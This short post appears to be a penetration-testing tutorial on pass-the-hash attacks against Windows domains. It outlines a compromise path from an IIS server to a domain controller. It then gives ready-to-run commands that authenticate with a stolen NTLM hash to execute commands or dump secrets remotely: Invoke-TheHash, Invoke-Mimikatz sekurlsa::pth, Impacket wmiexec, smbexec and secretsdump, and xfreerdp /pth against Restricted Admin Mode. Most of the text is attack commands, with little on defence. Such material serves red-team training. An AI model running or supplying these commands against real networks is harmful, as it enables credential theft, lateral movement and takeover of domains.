Consider this:

  • A threat actor compromises your website running on IIS
  • They successfully elevate privileges to SYSTEM
  • A domain user with admin privileges logged in at some point in the past, so their password hash is cached on the local machine
  • The actor dumps SAM and LSA secrets, revealing usernames and password hashes (sometimes clear-text passwords)
  • The usernames are checked against the domain for privileges, e.g. net user SomeUser /domain
  • After confirming the user is a Domain Admin, the actor moves laterally and authenticates to the Domain Controller without ever knowing the admin's actual password

This is a deliberately straightforward scenario; in practice the attack route is often less direct. Nevertheless, the ability to reuse a hash in place of the password can be devastating when left unchecked.

If you’re not pivoting into the network, there are several options, such as Invoke-TheHash.

Import-Module ./Invoke-TheHash.psd1
Invoke-WMIExec -Target 'HOST' -Domain 'DOMAIN' -Username 'USER' -Hash 'bc5473e951d0924378d90806da99b257' -Command 'cmd.exe /c calc'

Of course, mimikatz supports pass-the-hash attacks as well.

Invoke-Mimikatz "sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257 /run:`"cmd.exe /c calc`""

The same can be done with Impacket’s suite of tools.

proxychains4 -q wmiexec.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'
proxychains4 -q smbexec.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'
proxychains4 -q secretsdump.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'

Microsoft introduced Restricted Admin Mode to try to mitigate this attack. However, the feature inadvertently enabled pass-the-hash against RDP (original research by labs.portcullis.co.uk).

This attack works against Server 2012 R2 and Windows 8.1.

proxychains4 -q xfreerdp /u:USER /d:DOMAIN /pth:bc5473e951d0924378d90806da99b257 /v:RDPHOST